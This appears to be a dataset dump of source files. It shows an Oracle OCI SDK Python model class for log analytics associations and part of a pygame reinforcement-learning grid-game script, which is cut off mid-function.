repo_name: string, length 7 to 94
repo_path: string, length 4 to 237
repo_head_hexsha: string, length 40
content: string, length 10 to 680k
apis: string, length 2 to 840k
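The columns above describe one row per source file (repository name, file path, commit hash, file contents, and the extracted API calls). Below is a minimal sketch of reading such a dataset with the Hugging Face datasets library, assuming that is where this preview comes from; the dataset identifier is a placeholder, not a real name.

from datasets import load_dataset

# Placeholder identifier; substitute the actual dataset path.
ds = load_dataset("your-org/python-files-with-apis", split="train")

row = ds[0]
print(row["repo_name"], row["repo_path"], row["repo_head_hexsha"])
print(len(row["content"]), "chars of source,", len(row["apis"]), "chars of extracted API calls")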
Manny27nyc/oci-python-sdk
src/oci/log_analytics/models/log_analytics_association.py
de60b04e07a99826254f7255e992f41772902df7
# coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401 from oci.decorators import init_model_state_from_kwargs @init_model_state_from_kwargs class LogAnalyticsAssociation(object): """ LogAnalyticsAssociation """ #: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation. #: This constant has a value of "ACCEPTED" LIFE_CYCLE_STATE_ACCEPTED = "ACCEPTED" #: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation. #: This constant has a value of "IN_PROGRESS" LIFE_CYCLE_STATE_IN_PROGRESS = "IN_PROGRESS" #: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation. #: This constant has a value of "SUCCEEDED" LIFE_CYCLE_STATE_SUCCEEDED = "SUCCEEDED" #: A constant which can be used with the life_cycle_state property of a LogAnalyticsAssociation. #: This constant has a value of "FAILED" LIFE_CYCLE_STATE_FAILED = "FAILED" def __init__(self, **kwargs): """ Initializes a new LogAnalyticsAssociation object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param failure_message: The value to assign to the failure_message property of this LogAnalyticsAssociation. :type failure_message: str :param agent_id: The value to assign to the agent_id property of this LogAnalyticsAssociation. :type agent_id: str :param time_last_attempted: The value to assign to the time_last_attempted property of this LogAnalyticsAssociation. :type time_last_attempted: datetime :param retry_count: The value to assign to the retry_count property of this LogAnalyticsAssociation. :type retry_count: int :param source_name: The value to assign to the source_name property of this LogAnalyticsAssociation. :type source_name: str :param source_display_name: The value to assign to the source_display_name property of this LogAnalyticsAssociation. :type source_display_name: str :param source_type_name: The value to assign to the source_type_name property of this LogAnalyticsAssociation. :type source_type_name: str :param life_cycle_state: The value to assign to the life_cycle_state property of this LogAnalyticsAssociation. Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :type life_cycle_state: str :param entity_id: The value to assign to the entity_id property of this LogAnalyticsAssociation. :type entity_id: str :param entity_name: The value to assign to the entity_name property of this LogAnalyticsAssociation. :type entity_name: str :param entity_type_name: The value to assign to the entity_type_name property of this LogAnalyticsAssociation. :type entity_type_name: str :param host: The value to assign to the host property of this LogAnalyticsAssociation. :type host: str :param agent_entity_name: The value to assign to the agent_entity_name property of this LogAnalyticsAssociation. 
:type agent_entity_name: str :param entity_type_display_name: The value to assign to the entity_type_display_name property of this LogAnalyticsAssociation. :type entity_type_display_name: str :param log_group_id: The value to assign to the log_group_id property of this LogAnalyticsAssociation. :type log_group_id: str :param log_group_name: The value to assign to the log_group_name property of this LogAnalyticsAssociation. :type log_group_name: str :param log_group_compartment: The value to assign to the log_group_compartment property of this LogAnalyticsAssociation. :type log_group_compartment: str """ self.swagger_types = { 'failure_message': 'str', 'agent_id': 'str', 'time_last_attempted': 'datetime', 'retry_count': 'int', 'source_name': 'str', 'source_display_name': 'str', 'source_type_name': 'str', 'life_cycle_state': 'str', 'entity_id': 'str', 'entity_name': 'str', 'entity_type_name': 'str', 'host': 'str', 'agent_entity_name': 'str', 'entity_type_display_name': 'str', 'log_group_id': 'str', 'log_group_name': 'str', 'log_group_compartment': 'str' } self.attribute_map = { 'failure_message': 'failureMessage', 'agent_id': 'agentId', 'time_last_attempted': 'timeLastAttempted', 'retry_count': 'retryCount', 'source_name': 'sourceName', 'source_display_name': 'sourceDisplayName', 'source_type_name': 'sourceTypeName', 'life_cycle_state': 'lifeCycleState', 'entity_id': 'entityId', 'entity_name': 'entityName', 'entity_type_name': 'entityTypeName', 'host': 'host', 'agent_entity_name': 'agentEntityName', 'entity_type_display_name': 'entityTypeDisplayName', 'log_group_id': 'logGroupId', 'log_group_name': 'logGroupName', 'log_group_compartment': 'logGroupCompartment' } self._failure_message = None self._agent_id = None self._time_last_attempted = None self._retry_count = None self._source_name = None self._source_display_name = None self._source_type_name = None self._life_cycle_state = None self._entity_id = None self._entity_name = None self._entity_type_name = None self._host = None self._agent_entity_name = None self._entity_type_display_name = None self._log_group_id = None self._log_group_name = None self._log_group_compartment = None @property def failure_message(self): """ Gets the failure_message of this LogAnalyticsAssociation. The failure message. :return: The failure_message of this LogAnalyticsAssociation. :rtype: str """ return self._failure_message @failure_message.setter def failure_message(self, failure_message): """ Sets the failure_message of this LogAnalyticsAssociation. The failure message. :param failure_message: The failure_message of this LogAnalyticsAssociation. :type: str """ self._failure_message = failure_message @property def agent_id(self): """ Gets the agent_id of this LogAnalyticsAssociation. The agent unique identifier. :return: The agent_id of this LogAnalyticsAssociation. :rtype: str """ return self._agent_id @agent_id.setter def agent_id(self, agent_id): """ Sets the agent_id of this LogAnalyticsAssociation. The agent unique identifier. :param agent_id: The agent_id of this LogAnalyticsAssociation. :type: str """ self._agent_id = agent_id @property def time_last_attempted(self): """ Gets the time_last_attempted of this LogAnalyticsAssociation. The last attempt date. :return: The time_last_attempted of this LogAnalyticsAssociation. :rtype: datetime """ return self._time_last_attempted @time_last_attempted.setter def time_last_attempted(self, time_last_attempted): """ Sets the time_last_attempted of this LogAnalyticsAssociation. The last attempt date. 
:param time_last_attempted: The time_last_attempted of this LogAnalyticsAssociation. :type: datetime """ self._time_last_attempted = time_last_attempted @property def retry_count(self): """ Gets the retry_count of this LogAnalyticsAssociation. The number of times the association will be attempted before failing. :return: The retry_count of this LogAnalyticsAssociation. :rtype: int """ return self._retry_count @retry_count.setter def retry_count(self, retry_count): """ Sets the retry_count of this LogAnalyticsAssociation. The number of times the association will be attempted before failing. :param retry_count: The retry_count of this LogAnalyticsAssociation. :type: int """ self._retry_count = retry_count @property def source_name(self): """ Gets the source_name of this LogAnalyticsAssociation. The source name. :return: The source_name of this LogAnalyticsAssociation. :rtype: str """ return self._source_name @source_name.setter def source_name(self, source_name): """ Sets the source_name of this LogAnalyticsAssociation. The source name. :param source_name: The source_name of this LogAnalyticsAssociation. :type: str """ self._source_name = source_name @property def source_display_name(self): """ Gets the source_display_name of this LogAnalyticsAssociation. The source display name. :return: The source_display_name of this LogAnalyticsAssociation. :rtype: str """ return self._source_display_name @source_display_name.setter def source_display_name(self, source_display_name): """ Sets the source_display_name of this LogAnalyticsAssociation. The source display name. :param source_display_name: The source_display_name of this LogAnalyticsAssociation. :type: str """ self._source_display_name = source_display_name @property def source_type_name(self): """ Gets the source_type_name of this LogAnalyticsAssociation. The source type internal name. :return: The source_type_name of this LogAnalyticsAssociation. :rtype: str """ return self._source_type_name @source_type_name.setter def source_type_name(self, source_type_name): """ Sets the source_type_name of this LogAnalyticsAssociation. The source type internal name. :param source_type_name: The source_type_name of this LogAnalyticsAssociation. :type: str """ self._source_type_name = source_type_name @property def life_cycle_state(self): """ Gets the life_cycle_state of this LogAnalyticsAssociation. The lifecycle status. Valid values are ACCEPTED, IN_PROGRESS, SUCCEEDED or FAILED. Allowed values for this property are: "ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED", 'UNKNOWN_ENUM_VALUE'. Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'. :return: The life_cycle_state of this LogAnalyticsAssociation. :rtype: str """ return self._life_cycle_state @life_cycle_state.setter def life_cycle_state(self, life_cycle_state): """ Sets the life_cycle_state of this LogAnalyticsAssociation. The lifecycle status. Valid values are ACCEPTED, IN_PROGRESS, SUCCEEDED or FAILED. :param life_cycle_state: The life_cycle_state of this LogAnalyticsAssociation. :type: str """ allowed_values = ["ACCEPTED", "IN_PROGRESS", "SUCCEEDED", "FAILED"] if not value_allowed_none_or_none_sentinel(life_cycle_state, allowed_values): life_cycle_state = 'UNKNOWN_ENUM_VALUE' self._life_cycle_state = life_cycle_state @property def entity_id(self): """ Gets the entity_id of this LogAnalyticsAssociation. The entity unique identifier. :return: The entity_id of this LogAnalyticsAssociation. 
:rtype: str """ return self._entity_id @entity_id.setter def entity_id(self, entity_id): """ Sets the entity_id of this LogAnalyticsAssociation. The entity unique identifier. :param entity_id: The entity_id of this LogAnalyticsAssociation. :type: str """ self._entity_id = entity_id @property def entity_name(self): """ Gets the entity_name of this LogAnalyticsAssociation. The entity name. :return: The entity_name of this LogAnalyticsAssociation. :rtype: str """ return self._entity_name @entity_name.setter def entity_name(self, entity_name): """ Sets the entity_name of this LogAnalyticsAssociation. The entity name. :param entity_name: The entity_name of this LogAnalyticsAssociation. :type: str """ self._entity_name = entity_name @property def entity_type_name(self): """ Gets the entity_type_name of this LogAnalyticsAssociation. The entity type internal name. :return: The entity_type_name of this LogAnalyticsAssociation. :rtype: str """ return self._entity_type_name @entity_type_name.setter def entity_type_name(self, entity_type_name): """ Sets the entity_type_name of this LogAnalyticsAssociation. The entity type internal name. :param entity_type_name: The entity_type_name of this LogAnalyticsAssociation. :type: str """ self._entity_type_name = entity_type_name @property def host(self): """ Gets the host of this LogAnalyticsAssociation. The host name. :return: The host of this LogAnalyticsAssociation. :rtype: str """ return self._host @host.setter def host(self, host): """ Sets the host of this LogAnalyticsAssociation. The host name. :param host: The host of this LogAnalyticsAssociation. :type: str """ self._host = host @property def agent_entity_name(self): """ Gets the agent_entity_name of this LogAnalyticsAssociation. The name of the entity which contains the agent. :return: The agent_entity_name of this LogAnalyticsAssociation. :rtype: str """ return self._agent_entity_name @agent_entity_name.setter def agent_entity_name(self, agent_entity_name): """ Sets the agent_entity_name of this LogAnalyticsAssociation. The name of the entity which contains the agent. :param agent_entity_name: The agent_entity_name of this LogAnalyticsAssociation. :type: str """ self._agent_entity_name = agent_entity_name @property def entity_type_display_name(self): """ Gets the entity_type_display_name of this LogAnalyticsAssociation. The entity type display name. :return: The entity_type_display_name of this LogAnalyticsAssociation. :rtype: str """ return self._entity_type_display_name @entity_type_display_name.setter def entity_type_display_name(self, entity_type_display_name): """ Sets the entity_type_display_name of this LogAnalyticsAssociation. The entity type display name. :param entity_type_display_name: The entity_type_display_name of this LogAnalyticsAssociation. :type: str """ self._entity_type_display_name = entity_type_display_name @property def log_group_id(self): """ Gets the log_group_id of this LogAnalyticsAssociation. The log group unique identifier. :return: The log_group_id of this LogAnalyticsAssociation. :rtype: str """ return self._log_group_id @log_group_id.setter def log_group_id(self, log_group_id): """ Sets the log_group_id of this LogAnalyticsAssociation. The log group unique identifier. :param log_group_id: The log_group_id of this LogAnalyticsAssociation. :type: str """ self._log_group_id = log_group_id @property def log_group_name(self): """ Gets the log_group_name of this LogAnalyticsAssociation. The log group name. :return: The log_group_name of this LogAnalyticsAssociation. 
:rtype: str """ return self._log_group_name @log_group_name.setter def log_group_name(self, log_group_name): """ Sets the log_group_name of this LogAnalyticsAssociation. The log group name. :param log_group_name: The log_group_name of this LogAnalyticsAssociation. :type: str """ self._log_group_name = log_group_name @property def log_group_compartment(self): """ Gets the log_group_compartment of this LogAnalyticsAssociation. The log group compartment. :return: The log_group_compartment of this LogAnalyticsAssociation. :rtype: str """ return self._log_group_compartment @log_group_compartment.setter def log_group_compartment(self, log_group_compartment): """ Sets the log_group_compartment of this LogAnalyticsAssociation. The log group compartment. :param log_group_compartment: The log_group_compartment of this LogAnalyticsAssociation. :type: str """ self._log_group_compartment = log_group_compartment def __repr__(self): return formatted_flat_dict(self) def __eq__(self, other): if other is None: return False return self.__dict__ == other.__dict__ def __ne__(self, other): return not self == other
[((585, 15, 585, 40), 'oci.util.formatted_flat_dict', 'formatted_flat_dict', ({(585, 35, 585, 39): 'self'}, {}), '(self)', False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n'), ((364, 15, 364, 84), 'oci.util.value_allowed_none_or_none_sentinel', 'value_allowed_none_or_none_sentinel', ({(364, 51, 364, 67): 'life_cycle_state', (364, 69, 364, 83): 'allowed_values'}, {}), '(life_cycle_state, allowed_values)', False, 'from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel\n')]
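The content above is the full LogAnalyticsAssociation model from the OCI Python SDK, and the apis field lists the oci.util calls it makes. Below is a minimal usage sketch of that model, assuming the standard oci package layout; in practice instances are usually deserialized from service responses rather than built by hand, and the values shown are illustrative.

from oci.log_analytics.models import LogAnalyticsAssociation

# Construct an association directly from keyword arguments.
assoc = LogAnalyticsAssociation(
    source_name="LinuxSyslogSource",                          # illustrative value
    entity_name="my-host-entity",                             # illustrative value
    log_group_id="ocid1.loganalyticsloggroup.oc1..example",   # illustrative value
    life_cycle_state=LogAnalyticsAssociation.LIFE_CYCLE_STATE_SUCCEEDED,
)
print(assoc.life_cycle_state)  # "SUCCEEDED"

# The setter maps unrecognized values returned by the service to 'UNKNOWN_ENUM_VALUE'.
assoc.life_cycle_state = "SOME_FUTURE_STATE"
print(assoc.life_cycle_state)  # "UNKNOWN_ENUM_VALUE"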
zishanqin/Symbolic-transfer
symblic_game/NEW_GAME.py
b553f188ad3f6c6492fcff556ac6f597e56cf43e
'Author: Aimore Resende Riquetti Dutra' '''email: [email protected]''' # -------------------------------------------------------------------------------------------------- # # This code can run 4 different models of Reinforcement Learning: # Q-Learning (QL), DQN, SRL (DSRL), SRL+CS(DSRL_object_near) and some other variations of SRL # The setting for each run can be set at the end of the code # It can load and save the models in Excel form # There are some pre-defined environments, but you can create your own # Press G to get intermediate Graphs and P to stop # -------------------------------------------------------------------------------------------------- # import Class import pprint import random import sys import numpy as np import pygame # from pyglet import clock import pandas as pd import time import json from time import sleep import math import matplotlib.pyplot as plt import os import glob ## Comment this part if not using DQN model: # import keras # from keras.models import Sequential # from keras.layers import Dense, Activation, Flatten # from keras.models import model_from_json # from keras.optimizers import sgd # from keras.utils import plot_model # import tensorflow as tf # from keras.backend.tensorflow_backend import set_session # config = tf.ConfigProto() # config.gpu_options.per_process_gpu_memory_fraction = 0.3 # set_session(tf.Session(config=config)) # ------ environments ------ # region COLOR DEFINITION explore_set = set() explore_dict = dict() white = (255, 255, 255) black = (0, 0, 0) grey = (80, 80, 80) red = (255, 0, 0) blue = (0, 0, 255) green = (0, 255, 0) yellow = (250, 250, 0) pink = (250, 105, 180) # endregion # region PANDAS DEFINITION pd.set_option('display.max_columns', None) pd.set_option('display.large_repr', 'info') desired_width = 180 pd.set_option('display.width', desired_width) pd.set_option('precision', 4) # endregion np.random.seed(123) # For reproducibility pygame.init() # Pygame initialialization pp = pprint.PrettyPrinter(indent=4) actions = ['up', 'down', 'right', 'left'] actions_dict = {'up':0, 'down':1, 'right':2, 'left':3} p_keys = [pygame.K_w, pygame.K_a, pygame.K_s, pygame.K_d] # clock.tick(20) def pop(self): '''Removes a layer instance on top of the layer stack. 
''' while self.outputs: self.layers.pop() if not self.layers: self.outputs = [] self.inbound_nodes = [] self.outbound_nodes = [] else: self.layers[-1].outbound_nodes = [] self.outputs = [self.layers[-1].output] self.built = False # region REWARDS negative_reward = 5 # Negative Reward positive_reward = 1 # Positive Reward step_reward = 0 # Reward received by each step # endregion # ------ environments configuration (till line 640) ------ # region TEXT FONTS DEFINITION smallfont = pygame.font.SysFont('comicsansms', 13) smallfont_act = pygame.font.SysFont('arial', 13) mediumfont_act = pygame.font.SysFont('arial', 18, bold=True) pygame.font.init() # endregion # region DISPLAY FUNCTIONS def show_Alg(alg, screen): text = smallfont.render("Alg: " + alg, True, black) screen.blit(text, [5 + 90 * 0, 0]) def show_Samples(sample, screen): text = smallfont.render("Sample: " + str(sample), True, black) screen.blit(text, [60+100*1, 0]) def show_Level(level, screen): text = smallfont.render("Episode: " + str(level), True, black) screen.blit(text, [50+100*2, 0]) def show_Score(score, screen): text = smallfont.render("Score: " + str(score), True, black) screen.blit(text, [50+100*3, 0]) def show_Steps(steps, screen): text = smallfont.render("Steps: " + str(steps), True, black) screen.blit(text, [50+100*4, 0]) def show_Percent(percent, screen): text = smallfont.render("Percent: " + str(['%.2f' % elem for elem in percent]), True, black) screen.blit(text, [5, 30 * 4]) def show_Steps_list(steps_list, screen): text = smallfont.render("Steps_list: " + str(steps_list), True, black) screen.blit(text, [5, 30 * 1]) def show_Act_List(act_list, screen): text = smallfont_act.render("act_list: " + str(act_list), True, black) screen.blit(text, [5, 30 * 2]) def show_Action(act, screen): text = smallfont_act.render("Chosen Action: " + act, True, black) screen.blit(text, [5, 30 * 3]) def show_Env(env, screen): text = mediumfont_act.render("Environment: " + str(env), True, black) screen.blit(text, [50, 30 * 5]) # endregion # region CREATE OBJ_LIST FROM STATE AND RELATIONSHIP LIST BETWEEN AGENT AND OBJECTS ''' CREATE obj_list - FROM env ''' def create_obj_list(env): obj_list_fun = [] tp_list = [] loc_list = [] env = env.transpose() h_max = env.shape[0] # print("h_max", h_max) v_max = env.shape[1] # print("v_max",v_max) for h in range(1, (h_max - 1)): for v in range(1, (v_max - 1)): if env[h][v] != 0: tp_list.append(env[h][v]) loc_list.append((h, v)) for i in range(len(loc_list)): tp = tp_list[i] loc = loc_list[i] obj = Class.Obj(tp, loc) obj_list_fun.append(obj) return obj_list_fun ''' CREATE A RELATIONSHIP LIST BETWEEN AGENT AND OBJECTS - FROM obj_list ''' def relation_obj_list(obj_list, agent_pos): rel_list = [] xA = agent_pos[0] yA = agent_pos[1] # print("xA", xA) # print("yA", yA) for obj in obj_list: xB = obj.loc[0] yB = obj.loc[1] x = xA - xB y = yA - yB loc_dif = (x, y) # loc_dif = (x[0], y[0]) tp = obj.tp obj = Class.Obj(tp, loc_dif) rel_list.append(obj) return rel_list # endregion # region DRAW OBJECTS x_zero_screen = 50 y_zero_screen = 180 size_obj = 37 def draw_objects(agent, positivo_list, negativo_list, wall_list, screen): # Class.Grid.draw_grid(screen) # Uncomment to display a Grid for i in positivo_list: # POSITIVO screen.blit(i.icon, (i.pos[0] * size_obj + x_zero_screen, y_zero_screen + i.pos[1] * size_obj)) for i in negativo_list: # NEGATIVO screen.blit(i.icon, (i.pos[0] * size_obj + x_zero_screen, y_zero_screen + i.pos[1] * size_obj)) screen.blit(agent.icon, (agent.pos[0] * size_obj + x_zero_screen, 
y_zero_screen + agent.pos[1] * size_obj)) # AGENT for i in wall_list: # WALL screen.blit(i.icon, (i.pos[0] * size_obj + x_zero_screen, y_zero_screen + i.pos[1] * size_obj)) # endregion # region CREATE THE STATE FROM THE ENVIRONMENT def update_state(h_max, v_max, agent, positivo_list, negativo_list, wall_list): # state is defined in terms of symbols not pixels... state = np.zeros((v_max, h_max)).astype(np.int16) for i in positivo_list: state[i.pos[1]][i.pos[0]] = 60 # SYMBOL 60 POSITIVE for i in negativo_list: state[i.pos[1]][i.pos[0]] = 180 # SYMBOL 180 NEGATIVE for i in wall_list: state[i.pos[1]][i.pos[0]] = 255 # SYMBOL 255 # state[agent.pos[1]][agent.pos[0]] = 120 # SYMBOL 60 return state # TODO I have to check if this v_max and h_max have to be declared eveytime # endregion # region ENVIRONMENT CONFIGURATION def environment_conf(s_env): if s_env == 1: v_max = 4 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 1, 0]]) m_posi = np.matrix([[0, 1, 0], [0, 0, 0]]) elif s_env == 2: v_max = 4 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 1]]) m_posi = np.matrix([[0, 0, 1], [0, 0, 0]]) elif s_env == 3: v_max = 4 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[1, 0, 0], [0, 0, 0]]) m_posi = np.matrix([[0, 1, 0], [0, 0, 0]]) elif s_env == 4: v_max = 4 h_max = 4 x_agent = 1 y_agent = 1 m_nega = np.matrix([[0, 0], [0, 0]]) m_posi = np.matrix([[0, 0], [0, 1]]) elif s_env == 5: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.zeros(shape=(v_max - 2, h_max - 2)) m_posi = np.zeros(shape=(v_max - 2, h_max - 2)) while (True): x = random.randrange(0, h_max - 2) y = random.randrange(0, v_max - 2) if x != x_agent-1 or y != y_agent-1: element = (x, y) break m_posi[element] = 1 elif s_env == 6: v_max = 7 h_max = 7 x_agent = 3 y_agent = 3 m_nega = np.zeros(shape=(v_max - 2, h_max - 2)) m_posi = np.zeros(shape=(v_max - 2, h_max - 2)) while (True): x = random.randrange(0, h_max - 2) y = random.randrange(0, v_max - 2) if x != x_agent - 1 or y != y_agent - 1: element = (x, y) break m_posi[element] = 1 elif s_env == 7: v_max = 9 h_max = 9 x_agent = 4 y_agent = 4 m_nega = np.zeros(shape=(v_max - 2, h_max - 2)) m_posi = np.zeros(shape=(v_max - 2, h_max - 2)) while (True): x = random.randrange(0, h_max - 2) y = random.randrange(0, v_max - 2) if x != x_agent - 1 or y != y_agent - 1: element = (x, y) break m_posi[element] = 1 elif s_env == 8: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 0], [1, 0, 1]]) m_posi = np.matrix([[1, 0, 1], [0, 0, 0], [0, 0, 0]]) elif s_env == 9: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[1, 0, 0], [0, 0, 0], [0, 0, 1]]) m_posi = np.matrix([[0, 0, 1], [0, 0, 0], [1, 0, 0]]) elif s_env == 10: v_max = 9 h_max = 9 x_agent = 4 y_agent = 4 m_nega = np.matrix([[1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1]]) m_posi = np.matrix([[0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0], [0, 0, 0, 0, 0, 0, 0], [0, 0, 1, 0, 0, 0, 1], [0, 0, 0, 0, 0, 0, 0], [1, 0, 0, 0, 1, 0, 0]]) elif s_env == 11: v_max = 9 h_max = 9 x_agent = 4 y_agent = 4 element_list = [] for n in range(14): while(True): x = random.randrange(0,7) y = random.randrange(0,7) if x != 3 and y != 3 and (x,y) not in element_list: element = (x, y) break element_list.append(element) m_nega = np.zeros(shape=(v_max-2, h_max-2)) m_posi = np.zeros(shape=(v_max-2, h_max-2)) half = len(element_list) / 2 
nega_list = element_list[:int(half)] posi_list = element_list[int(half):] for ele in nega_list: m_nega[ele] = 1 for ele in posi_list: m_posi[ele] = 1 elif s_env == 12: v_max = 3 h_max = 5 x_agent = 2 y_agent = 1 m_nega = np.matrix([1, 0, 0]) m_posi = np.matrix([0, 0, 1]) elif s_env == 13: v_max = 3 h_max = 5 x_agent = 2 y_agent = 1 m_nega = np.matrix([0, 0, 0]) m_posi = np.matrix([1, 0, 1]) elif s_env == 14: v_max = 3 h_max = 6 x_agent = 2 y_agent = 1 m_nega = np.matrix([1, 0, 0, 0]) m_posi = np.matrix([0, 0, 0, 1]) elif s_env == 15: v_max = 3 h_max = 6 x_agent = 2 y_agent = 1 m_nega = np.matrix([0, 0, 0, 0]) m_posi = np.matrix([1, 0, 0, 1]) elif s_env == 16: v_max = 3 h_max = 7 x_agent = 3 y_agent = 1 m_nega = np.matrix([1, 0, 0, 0, 0]) m_posi = np.matrix([0, 0, 0, 0, 1]) elif s_env == 17: v_max = 3 h_max = 7 x_agent = 3 y_agent = 1 m_nega = np.matrix([0, 0, 0, 0, 0]) m_posi = np.matrix([1, 0, 0, 0, 1]) elif s_env == 18: v_max = 3 h_max = 9 x_agent = 4 y_agent = 1 m_nega = np.matrix([1, 0, 0, 0, 0, 0, 0]) m_posi = np.matrix([0, 0, 0, 0, 0, 0, 1]) elif s_env == 19: v_max = 3 h_max = 9 x_agent = 4 y_agent = 1 m_nega = np.matrix([0, 0, 0, 0, 0, 0, 0]) m_posi = np.matrix([1, 0, 0, 0, 0, 0, 1]) elif s_env == 20: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 0], [0, 0, 0]]) m_posi = np.matrix([[1, 0, 1], [0, 0, 0], [0, 1, 0]]) elif s_env == 21: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[0, 1, 0], [0, 0, 0], [1, 0, 1]]) m_posi = np.matrix([[1, 0, 1], [0, 0, 0], [0, 1, 0]]) elif s_env == 22: v_max = 5 h_max = 5 x_agent = 2 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 0], [0, 0, 0]]) m_posi = np.matrix([[1, 0, 1], [0, 0, 0], [1, 0, 1]]) if s_env == 31: v_max = 5 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 1, 0], [0, 0, 0]]) m_posi = np.matrix([[0, 1, 0], [0, 0, 0], [0, 0, 0]]) elif s_env == 32: v_max = 5 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[0, 0, 0], [0, 0, 1], [0, 0, 0]]) m_posi = np.matrix([[0, 0, 1], [0, 0, 0], [0, 0, 0]]) elif s_env == 33: v_max = 5 h_max = 5 x_agent = 1 y_agent = 2 m_nega = np.matrix([[1, 0, 0], [0, 0, 0], [0, 0, 0]]) m_posi = np.matrix([[0, 1, 0], [0, 0, 0], [0, 0, 0]]) else: pass "INSTANCE THE wall_list" wall_list = [] for y in range(v_max): for x in range(h_max): if y == v_max - 1 or y == 0 or x == h_max - 1 or x == 0: wall = Class.Wall('wall', x, y) wall_list.append(wall) "INSTANCE THE AGENT" agent = Class.Agent('agent', x_agent, y_agent) "INSTANCE POSITIVE OBJECTS" positivo_list = [] for x in range(m_posi.shape[0]): for y in range(m_posi.shape[1]): if m_posi[x, y] == 1: positivo = Class.Positivo('positivo', y + 1, x + 1) positivo_list.append(positivo) "INSTANCE NEGATIVE OBJECTS" negativo_list = [] for x in range(m_nega.shape[0]): for y in range(m_nega.shape[1]): if m_nega[x, y] == 1: negativo = Class.Negativo('negativo', y + 1, x + 1) negativo_list.append(negativo) return negativo_list, positivo_list, agent, wall_list, h_max, v_max # endregion # region SAVE - LOAD - CREATE def save_model(model, path): model.save_weights(path + ".h5", overwrite=True) with open(path + ".json", "w") as outfile: json.dump(model.to_json(), outfile) def load_model(s_alg, path): optimizer_config = [] print(path) if s_alg == "QL": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model") elif s_alg == "DSRL": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_dist": path = path + ".xlsx" model = pd.read_excel(path, 
sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_dist_type": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_dist_type_near": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_dist_type_near_propNeg": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_object_near": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0,1]) elif s_alg == "DSRL_object": path = path + ".xlsx" model = pd.read_excel(path, sheetname="model", header=[0], index_col=[0, 1]) elif s_alg == "DQN": with open(path + ".json", "r") as jfile: model = model_from_json(json.load(jfile)) model.load_weights(path + ".h5") conf = pd.read_excel(path + ".xlsx", sheetname="Run_Conf", header=[0]) # net_conf = conf.loc[[16:20],:] # print("net_conf", net_conf) optimizer = conf.loc[19, "A"] print("op_conf ", optimizer) # pd.Series({'N_actions': net_conf["N_actions"]}), # pd.Series({'Max_memory': net_conf["Max_memory"]}), # pd.Series({'Hidden_size': net_conf["Hidden_size"]}), # pd.Series({'Batch_size': net_conf["Batch_size"]}), # pd.Series({'Optimizer': net_conf["Optimizer"]}), # pd.Series({'lr': op_conf[0]}), # pd.Series({'beta_1': op_conf[1]}), # pd.Series({'beta_2': op_conf[2]}), # pd.Series({'epsilon': op_conf[3]}), # pd.Series({'decay': op_conf[4]}), # pd.Series({'rho': op_conf[5]}) use_optimizer, optimizer_config = define_optimizer(optimizer) model.compile(loss='mse', optimizer=use_optimizer) model.summary() # pass return model, optimizer_config def create_model(s_alg, state_shape, net_conf): optimizer_config = [] if s_alg == "QL": model = pd.DataFrame() model.index.name = ["States", "Action"] elif s_alg == "DSRL" or s_alg == "DSRL_dist" or s_alg == "DSRL_dist_type" or s_alg == "DSRL_dist_type_near" or s_alg == "DSRL_dist_type_near_propNeg" or s_alg == "DSRL_object_near" or s_alg == "DSRL_object": m_index = pd.MultiIndex(levels=[[''], [""]], labels=[[], []], names=['state', 'actions']) model = pd.DataFrame(index=m_index) elif s_alg == "DQN": model = Sequential() pop(model) model = Sequential() model.add(Dense(net_conf["Hidden_size"], input_dim=state_shape[0]*state_shape[1], activation="relu", name="DENSE_1")) model.add(Dense(net_conf["Hidden_size"], activation='relu', 